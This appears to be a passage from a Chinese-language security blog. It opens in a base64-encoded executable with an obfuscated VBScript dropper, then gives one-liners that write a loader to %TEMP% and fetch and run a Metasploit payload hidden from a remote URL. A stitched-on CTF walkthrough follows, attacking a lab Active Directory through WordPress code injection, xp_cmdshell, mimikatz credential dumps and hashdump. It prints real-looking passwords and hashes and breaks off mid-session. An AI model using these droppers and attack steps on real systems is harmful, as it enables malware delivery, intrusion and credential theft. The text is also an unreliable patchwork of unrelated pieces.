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"
      Dim GBHMAfCsea
      Set GBHMAfCsea = CreateObject("Scripting.FileSystemObject")
      Dim nYosrMtHSIOKSTI
      Dim LNXsqHXEKZQU
      Set nYosrMtHSIOKSTI = GBHMAfCsea.GetSpecialFolder(2)
      LNXsqHXEKZQU = nYosrMtHSIOKSTI & "\" & GBHMAfCsea.GetTempName()
      GBHMAfCsea.CreateFolder(LNXsqHXEKZQU)
      YeQZhbvaLPekFW = LNXsqHXEKZQU & "\" & "QoziwORKliqRDPs.exe"
      Dim voFeIDpffjdo
      Set voFeIDpffjdo = CreateObject("Wscript.Shell")
      WwqoNcaCIbw = oSpLpsWeU(cTENSbYbnWY)
      Set WQwWDbhse = CreateObject("ADODB.Stream")
      WQwWDbhse.Type = 1
      WQwWDbhse.Open
      WQwWDbhse.Write WwqoNcaCIbw
      WQwWDbhse.SaveToFile YeQZhbvaLPekFW, 2
      voFeIDpffjdo.run YeQZhbvaLPekFW, 0, true
      GBHMAfCsea.DeleteFile(YeQZhbvaLPekFW)
      GBHMAfCsea.DeleteFolder(LNXsqHXEKZQU)
    End Function
    
    skbfzWOqR

    演示:
    可以把生成的payload放到服务器,然后再目标系统上执行ps代码,文章开头说的远程下载:

    如何以简单/兼容的方式运行payload?

    阅读代码,我们可以创建一个名为msf.vbs的简单的vbs脚本来执行shellcode。 vbs脚本可以在Windows XP / 2003 / Vista / 7/8/10/2008/2012 / ....上执行

    shellcode = WScript.Arguments.Item(0)
    strXML = "" & shellcode & ""
    Set oXMLDoc = CreateObject("MSXML2.DOMDocument.3.0")
    oXMLDoc.LoadXML(strXML) decode = oXMLDoc.selectsinglenode("B64DECODE").nodeTypedValue
    set oXMLDoc = nothing
     Dim fso
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim tempdir
    Dim basedir
    Set tempdir = fso.GetSpecialFolder(2)
    basedir = tempdir & "\" & fso.GetTempName()
    fso.CreateFolder(basedir)
    tempexe = basedir & "\" & "test.exe"
    Dim adodbstream
    Set adodbstream = CreateObject("ADODB.Stream")
    adodbstream.Type = 1
    adodbstream.Open
    adodbstream.Write decode
    adodbstream.SaveToFile tempexe, 2
    Dim wshell
    Set wshell = CreateObject("Wscript.Shell")
    wshell.run tempexe, 0, true
    fso.DeleteFile(tempexe)
    fso.DeleteFolder(basedir)
    
    Ok, how to run it in cmd.exe ? Do you want  to paste the code line by line ?  A simple command is created as follow:

    用一个简单的命令上传msf.vbs到目标系统:

    echo shellcode = WScript.Arguments.Item(0):strXML = ^"^^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir) > %TEMP%\msf.vbs

    用msf.vbs和cscript.exe执行metasploit payload:

    C:\Documents and Settings\test\Desktop> cscript.exe msf.vbs <msf-vbs-shellcode>

    绕过nc shell缓冲区大小限制

    如果脚本在本地主机上的cmd.exe中使用,则一切正常。 但是,如果它在netcat cmd shell中使用,则 payload将被破坏。例如:

    C:\Documents and Settings\test\Desktop>cscript.exe %TEMP%\msf.vbs TVqQAAMAA.....AAAAAP
    
    Microsoft (R) Windows Script Host Version 5.7
    Copyright (C) Microsoft Corporation. All rights reserved.
    
    C:\DOCUME~1\test\LOCALS~1\Temp\msf.vbs(1, 53) Microsoft VBScript compilation error: Syntax error
    • origin payload size: 6160
    • netcat handle payload size: 4068

    请自己尝试,为了安全测试,另外创建了一个vbs脚本。

    echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^<B64DECODE xmlns:dt=^" ^& Chr(34) ^& ^"urn:schemas-microsoft-com:datatypes^" ^& Chr(34) ^& ^" ^" ^& ^"dt:dt=^" ^& Chr(34) ^& ^"bin.base64^" ^& Chr(34) ^& ^"^>^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs

    运行以下命令来执行您的vbs payload:

    START /B cscript.exe %TEMP%\msf.vbs http://192.168.1.100:8080/payload.txt

    参考来源

    Hacking Windows Active Directory

    目录

    1. Description
    2. Workthrough
    2.1 10.1.222.203
     2.1.1 Wordpress - Code Injection
    2.2 10.1.222.200
     2.2.1 Port Scanning
     2.2.2 XP_CMDSHELL
    2.3 10.1.222.201
     2.3.1 MS14-068
    2.4 10.1.222.202

    描述

    Description
        read Flag from C:\file.sys on Windows DC. Please find Windows DC yourself.
    
    Target
        http://10.1.222.203 (The Start)
    
            10.1.222.200
            10.1.222.201
            10.1.222.202
            10.1.222.203

    演练

    攻击地图:

    ---->[10.1.222.203]---->[10.1.222.200]---->[10.1.222.201]---->[10.1.222.202]
    . 10.1.222.203
        wordpress vuln(code injecion)。
        从wp-config.php中读取密码
        用密码登录10.1.222.200的SQL Server。
    
    2. 10.1.222.200
        访问SQL SERVER,并启用XP_CMDSHELL
        添加一个管理员用户。
    
    3. 10.1.222.201
        渗透MS14-068的Windows域管理员
        管理员桌面上的mstsc客户端
    
    4. 10.1.222.202
        获得Windows DC管理员权限。 
    

    WORDPRESS
    用参数p扫描wordpress插件。

    ┌─[✗]─[lab@core]─[/opt/wpscan]
    └──╼ ruby wpscan.rb --url 10.1.222.203 --enumerate p
    _______________________________________________________________
            __          _______   _____                  
            \ \        / /  __ \ / ____|                 
             \ \  /\  / /| |__) | (___   ___  __ _ _ __  
              \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
               \  /\  /  | |     ____) | (__| (_| | | | |
                \/  \/   |_|    |_____/ \___|\__,_|_| |_|
    
            WordPress Security Scanner by the WPScan Team
                           Version 2.8
              Sponsored by Sucuri - https://sucuri.net
       @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
    _______________________________________________________________
    
    [+] URL: http://10.1.222.203/
    [+] Started: Tue Sep  8 03:21:27 2015
    
    [+] robots.txt available under: 'http://10.1.222.203/robots.txt'
    [!] The WordPress 'http://10.1.222.203/readme.html' file exists exposing a version number
    [+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
    [+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.12
    [+] XML-RPC Interface available under: http://10.1.222.203/xmlrpc.php
    
    [+] WordPress version 4.3 identified from meta generator
    
    [+] WordPress theme in use: twentyfifteen - v1.3
    
    [+] Name: twentyfifteen - v1.3
     |  Location: http://10.1.222.203/wp-content/themes/twentyfifteen/
     |  Readme: http://10.1.222.203/wp-content/themes/twentyfifteen/readme.txt
     |  Style URL: http://10.1.222.203/wp-content/themes/twentyfifteen/style.css
     |  Theme Name: Twenty Fifteen
     |  Theme URI: https://wordpress.org/themes/twentyfifteen/
     |  Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...
     |  Author: the WordPress team
     |  Author URI: https://wordpress.org/
    
    [+] Enumerating installed plugins  ...
    
       Time: 00:03:46 <=============================================================> (1906 / 1906) 100.00% Time: 00:03:46
    
    [+] We found 2 plugins:
    
    [+] Name: akismet
     |  Location: http://10.1.222.203/wp-content/plugins/akismet/
    
    [+] Name: cm-download-manager
     |  Location: http://10.1.222.203/wp-content/plugins/cm-download-manager/
     |  Readme: http://10.1.222.203/wp-content/plugins/cm-download-manager/readme.txt
    
    [!] We could not determine a version so all vulnerabilities are printed out
    
    [!] Title: CM Download Manager <= 2.0.0 - Code Injection
        Reference: https://wpvulndb.com/vulnerabilities/7679
        Reference: http://packetstormsecurity.com/files/129183/
        Reference: https://downloadsmanager.cminds.com/release-notes/
        Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8877
        Reference: http://osvdb.org/show/osvdb/114867
        Reference: https://www.exploit-db.com/exploits/35324/
    [i] Fixed in: 2.0.4
    
    [!] Title: CM Download Manager <= 2.0.6 - XSS and CSRF
        Reference: https://wpvulndb.com/vulnerabilities/7756
        Reference: http://packetstormsecurity.com/files/129357/
        Reference: http://www.securityfocus.com/bid/71418/
        Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9129
        Reference: http://osvdb.org/show/osvdb/115223
    [i] Fixed in: 2.0.7
    
    [+] Finished: Tue Sep  8 03:25:29 2015
    [+] Requests Done: 2001
    [+] Memory used: 41.98 MB
    [+] Elapsed time: 00:04:02

    Code Injection / Xss and CSRF are here.

    Code Injection:尝试使用CM下载管理器<= 2.0.0 - 代码注入,信息:
    http://10.1.222.203/cmdownloads/?CMDsearch=%22.phpinfo%28%29.%22

    从phpinfo页面查看禁用功能。

    system,
    exec,
    shell_exec,
    passthru,
    popen,
    dl,
    proc_open,
    popen,
    curl_exec,
    curl_multi_exec,
    parse_ini_file,
    show_source,
    pcntl_alarm,
    pcntl_fork,
    pcntl_waitpid,
    pcntl_wait,
    pcntl_wifexited,
    pcntl_wifstopped,
    pcntl_wifsignaled,
    pcntl_wexitstatus,
    pcntl_wtermsig,
    pcntl_wstopsig,
    pcntl_signal,
    pcntl_signal_dispatch,
    pcntl_get_last_error,
    pcntl_strerror,
    pcntl_sigprocmask,
    pcntl_sigwaitinfo,
    pcntl_sigtimedwait,
    pcntl_exec,
    pcntl_getpriority,
    pcntl_setpriority,

    阅读wordpress配置文件wp-config.php:

    http://10.1.222.203/cmdownloads/?CMDsearch=".print_r(scandir('.'))."
    http://10.1.222.203/cmdownloads/?CMDsearch=".print_r(file_get_contents('wp-config.php'))."

    wp-config.php的内容如下:

    /**
     * The base configuration for WordPress
     *
     * The wp-config.php creation script uses this file during the
     * installation. You don't have to use the web site, you can
     * copy this file to "wp-config.php" and fill in the values.
     *
     * This file contains the following configurations:
     *
     * * MySQL settings
     * * Secret keys
     * * Database table prefix
     * * ABSPATH
     *
     * @link https://codex.wordpress.org/Editing_wp-config.php
     *
     * @package WordPress
     */
    /*
     * hello world!
     *
     *
     * =========================================================================
     * Hackers, Welcome Here:
     *
     * 1、Please keey everything work well;
     * 2、Maybe 10.1.222.203's root privilege is not important;
     * 3、Logging is enable, and don't try to destroy the lab machine;
     * 4、Targets:10.1.222.200、10.1.222.201、10.1.222.202、10.1.222.203 ;
     * 5、read C:\file.sys on Windows DC;
     * 6、Tools here: http://10.1.222.203/toolsforyou/
     * 7、Enjoy It!
     * 8. Happy Hacking !
    *  =========================================================================
      * * /
    
     // ** MySQL settings - You can get this info from your web host ** //
    /** The name of the database for WordPress */
    define('DB_NAME', 'test');
    
    /** MySQL database username */
    define('DB_USER', 'root');
    
    /** MySQL database password */
    define('DB_PASSWORD', 'Xd1moYqFr');
    
    /** MySQL hostname */
    define('DB_HOST', '10.1.222.200');
    
    /** Database Charset to use in creating database tables. */
    define('DB_CHARSET', 'utf8mb4');
    
    /** The Database Collate type. Don't change this if in doubt. */
    define('DB_COLLATE', '');
    
    /**#@+
     * Authentication Unique Keys and Salts.
     *
     * Change these to different unique phrases!
     * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
     * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
     *
     * @since 2.6.0
     */
    define('AUTH_KEY',         '^01/8T?sIYu5/zkZ/;5AcsN R5Nf0cy{aI4w%J5+_O1PWn!RBX8vje8Q|G:*2h_d');
    define('SECURE_AUTH_KEY',  ',{0:g.r(ml9LY+lpe4EG-SQ`Np p@r+8g6hiRYy0VAoMn~h[2XBU{X83(]MMkajF');
    define('LOGGED_IN_KEY',    'RO}{Eyw(<(J=g|6=b4*Q(f-Uk&XB3.Hv6 XTGg!+C9Du-86U4e.wY9+,Zz&h0 (_');
    define('NONCE_KEY',        'SN2+N1ZA6v[a.QgfGsZHyq&8 tO. 4^FNrlea:|7ifM)m-Uy!H^;At-8MeqrwMRM');
    define('AUTH_SALT',        'HE<}>b.$S.GKNy@cUXCezBJmGkVM~GO/R%jB}6y~@HY3 W{%+,]mkpbEjC|GQ73!');
    define('SECURE_AUTH_SALT', '.0Jix9L(%)XxhlNA3~IFPKWs!jm|VJ_]}J))@jpQV_]T>T7)i-e@z#k0W^q/Eq[G');
    define('LOGGED_IN_SALT',   'V2bk%aIT-yTnvcj7+n,).IVygEdkc<p8VDWw-E&D^hS)2dR%ld&vZv`He|fdxalN');
    define('NONCE_SALT',       'r+zYG+^AcZFA3;|d0]@.;7]PD>[9@Jv[@eLZ-u;v#l&R%@g40x?:4CO/-?y)3t=]');

    10.1.222.203的数据库来自10.1.222.200。

    10.1.222.200

    Port Scanning
    用nmap扫描打开的端口,我们找到tcp / 1433 - SQL Server。

    Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-08 12:04 China Standard Time
    Initiating SYN Stealth Scan at 12:04
    Scanning 10.1.222.200 [1000 ports]
    Discovered open port 3306/tcp on 10.1.222.200
    Discovered open port 139/tcp on 10.1.222.200
    Discovered open port 135/tcp on 10.1.222.200
    Discovered open port 3389/tcp on 10.1.222.200
    Discovered open port 445/tcp on 10.1.222.200
    Discovered open port 1433/tcp on 10.1.222.200
    Discovered open port 49152/tcp on 10.1.222.200
    Discovered open port 49156/tcp on 10.1.222.200
    Discovered open port 49154/tcp on 10.1.222.200
    Discovered open port 49155/tcp on 10.1.222.200
    Discovered open port 49153/tcp on 10.1.222.200
    Discovered open port 49157/tcp on 10.1.222.200
    Completed SYN Stealth Scan at 12:04, 2.37s elapsed (1000 total ports)
    Nmap scan report for 10.1.222.200
    Host is up (0.060s latency).
    Not shown: 988 closed ports
    PORT      STATE SERVICE
    135/tcp   open  msrpc
    139/tcp   open  netbios-ssn
    445/tcp   open  microsoft-ds
    1433/tcp  open  ms-sql-s
    3306/tcp  open  mysql
    3389/tcp  open  ms-wbt-server
    49152/tcp open  unknown
    49153/tcp open  unknown
    49154/tcp open  unknown
    49155/tcp open  unknown
    49156/tcp open  unknown
    49157/tcp open  unknown
    
    Read data files from: C:\Program Files\Nmap
    Nmap done: 1 IP address (1 host up) scanned in 2.52 seconds
               Raw packets sent: 1009 (44.396KB) | Rcvd: 1000 (40.048KB)
    

    使用sa/Xd1moYqFr成功访问SQL Server。

    • Linux - Freetds Usage.
    • Windows - QueryExpress

    XP_CMDSHELL
    连接到SQL SERVER(10.1.222.200:1433)

    ┌─[✗]─[lab@core]─[/opt]
    └──╼ tsql -S egServer70 -U sa
    Password:
    locale is "en_US.UTF-8"
    locale charset is "UTF-8"
    using default charset "UTF-8"
    1> select @@version
    2> go
    
    Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)
            Apr  2 2010 15:48:46
            Copyright (c) Microsoft Corporation
            Standard Edition (64-bit) on Windows NT 6.1 <X64> (Build 7600: ) (Hypervisor)
    
    (1 row affected)

    数据库版本:SQL SERVER 2008.使用命令启用XP_CMDSHELL。

    1> EXEC sp_configure 'show advanced options',1
    2> GO
    Msg 15457 (severity 0, state 1) from DATABASE, Procedure sp_configure Line 174:
            "Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install."
    (return status = 0)
    1> RECONFIGURE
    2> GO
    1> EXEC sp_configure 'xp_cmdshell',1
    2> GO
    Msg 15457 (severity 0, state 1) from DATABASE, Procedure sp_configure Line 174:
            "Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install."
    (return status = 0)
    1> RECONFIGURE
    2> GO

    add a administrator with XP_CMDSHELL.

    1> EXEC xp_cmdshell 'whoami'
    2> GO
    output
    nt authority\system
    NULL
    (2 rows affected)
    (return status = 0)
    
    1> EXEC xp_cmdshell 'wmic useraccount get name,sid'
    2> GO
    output
    Name           SID                                           
    Administrator  S-1-5-21-30580861-1793299886-3410204933-500   
    ctfcx          S-1-5-21-30580861-1793299886-3410204933-1010  
    Guest          S-1-5-21-30580861-1793299886-3410204933-501   
    test           S-1-5-21-30580861-1793299886-3410204933-1015  
    
    NULL
    (7 rows affected)
    (return status = 0)
    1>

    添加管理员用户,并成功访问10.1.222.200。 我们可以用mimikatz读取明确的密码。

    C:\Users\Administrator\Desktop\mimikatz_trunk\x64>mimikatz.exe
    
      .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48)
     .## ^ ##.
     ## / \ ##  /* * *
     ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
      '#####'                                     with 16 modules * * */
    
    mimikatz # privilege::debug
    Privilege '20' OK
    
    mimikatz # sekurlsa::logonpasswords
    
    Authentication Id : 0 ; 111120 (00000000:0001b210)
    Session           : RemoteInteractive from 2
    User Name         : Administrator
    Domain            : MASTER
    Logon Server      : MASTER
    Logon Time        : 2015/9/7 11:46:22
    SID               : S-1-5-21-30580861-1793299886-3410204933-500
            msv :
             [00000003] Primary
             * Username : Administrator
             * Domain   : MASTER
             * LM       : b4d9e05213448dbd263365ce2184209e
             * NTLM     : 68f8b3e056dc171163f597288f47607e
             * SHA1     : 50af106ec94c0739cd235d8a858f6e4fb255b3d0
            tspkg :
             * Username : Administrator
             * Domain   : MASTER
             * Password : 6GbA6Crdw
            wdigest :
             * Username : Administrator
             * Domain   : MASTER
             * Password : 6GbA6Crdw
            kerberos :
             * Username : hanlei
             * Domain   : PENTEST.COM
             * Password : (null)
            ssp :
            credman :
    
    Authentication Id : 0 ; 996 (00000000:000003e4)
    Session           : Service from 0
    User Name         : MASTER$
    Domain            : PENTEST
    Logon Server      : (null)
    Logon Time        : 2015/9/7 11:45:58
    SID               : S-1-5-20
            msv :
             [00000003] Primary
             * Username : MASTER$
             * Domain   : PENTEST
             * NTLM     : af55bb72b1ca4ea6a3eac30216fac37b
             * SHA1     : 24e18ef140a487fa902f65a75db4cd075414656c
            tspkg :
            wdigest :
             * Username : MASTER$
             * Domain   : PENTEST
             * Password : % Xd^8W*+Ym0O&M^7zj'R2ResK!GPB%WNqrW2$3+i.B"N8h\,e!wbONFEpPu/#+VWiK2nYqs\s<yX`2CDO)I/sbD$pwUtiYN4\_ \zUh`,zWN;E`;S!xkcQ0
            kerberos :
             * Username : master$
             * Domain   : PENTEST.COM
             * Password : % Xd^8W*+Ym0O&M^7zj'R2ResK!GPB%WNqrW2$3+i.B"N8h\,e!wbONFEpPu/#+VWiK2nYqs\s<yX`2CDO)I/sbD$pwUtiYN4\_ \zUh`,zWN;E`;S!xkcQ0
            ssp :
            credman :
    
    Authentication Id : 0 ; 35562 (00000000:00008aea)
    Session           : UndefinedLogonType from 0
    User Name         : (null)
    Domain            : (null)
    Logon Server      : (null)
    Logon Time        : 2015/9/7 11:45:56
    SID               :
            msv :
             [00000003] Primary
             * Username : MASTER$
             * Domain   : PENTEST
             * NTLM     : af55bb72b1ca4ea6a3eac30216fac37b
             * SHA1     : 24e18ef140a487fa902f65a75db4cd075414656c
            tspkg :
            wdigest :
            kerberos :
            ssp :
            credman :
    
    Authentication Id : 0 ; 997 (00000000:000003e5)
    Session           : Service from 0
    User Name         : LOCAL SERVICE
    Domain            : NT AUTHORITY
    Logon Server      : (null)
    Logon Time        : 2015/9/7 11:45:58
    SID               : S-1-5-19
            msv :
            tspkg :
            wdigest :
             * Username : (null)
             * Domain   : (null)
             * Password : (null)
            kerberos :
             * Username : (null)
             * Domain   : (null)
             * Password : (null)
            ssp :
            credman :
    
    Authentication Id : 0 ; 999 (00000000:000003e7)
    Session           : UndefinedLogonType from 0
    User Name         : MASTER$
    Domain            : PENTEST
    Logon Server      : (null)
    Logon Time        : 2015/9/7 11:45:56
    SID               : S-1-5-18
            msv :
            tspkg :
            wdigest :
             * Username : MASTER$
             * Domain   : PENTEST
             * Password : % Xd^8W*+Ym0O&M^7zj'R2ResK!GPB%WNqrW2$3+i.B"N8h\,e!wbONFEpPu/#+VWiK2nYqs\s<yX`2CDO)I/sbD$pwUtiYN4\_ \zUh`,zWN;E`;S!xkcQ0
            kerberos :
             * Username : master$
             * Domain   : PENTEST.COM
             * Password : % Xd^8W*+Ym0O&M^7zj'R2ResK!GPB%WNqrW2$3+i.B"N8h\,e!wbONFEpPu/#+VWiK2nYqs\s<yX`2CDO)I/sbD$pwUtiYN4\_ \zUh`,zWN;E`;S!xkcQ0
            ssp :
            credman :
    
    mimikatz # exit
    Bye!

    我们也可以使用metasploit模块exploit/windows /mssql/mssql_payload来获取meterpreter shell。

    msf post(hashdump) > sessions -l
    
    Active sessions
    ===============
    
      Id  Type                   Information                     Connection
      --  ----                   -----------                     ----------
      1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DATABASE  10.255.254.23:8088 -> 10.1.222.200:56671 (10.1.222.200)
    
    msf post(hashdump) > run
    [/i][/i][i][i] Obtaining the boot key...[/i][/i][i][i] Calculating the hboot key using SYSKEY 89e7950dda3ecc11525391db37acf6a8...[/i][/i][i][i] Obtaining the user list and keys...[/i][/i][i][i] Decrypting user keys...[/i][/i][i][i] Dumping password hints...
    
    No users with password hints on this system
    [/i][/i][i][i] Dumping password hashes...
    
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:68f8b3e056dc171163f597288f47607e:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    
    [/i][/i][i][i] Post module execution completed
    msf post(hashdump) > creds
    Credentials
    ===========
    
    host          origin        service        public         private                                                            realm  private_type
    ----          ------        -------        ------         -------                                                            -----  ------------
    10.1.222.200  10.1.222.200  445/tcp (smb)  administrator  aad3b435b51404eeaad3b435b51404ee:68f8b3e056dc171163f597288f47607e         NTLM hash
    10.1.222.200  10.1.222.200  445/tcp (smb)  guest          aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0         NTLM hash
    
    msf post(hashdump) > use post/windows/gather/credentials/sso
    msf post(sso) > show options
    
    Module options (post/windows/gather/credentials/sso):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SESSION                   yes       The session to run this module on.
    
    msf post(sso) > set SESSION 1
    SESSION => 1
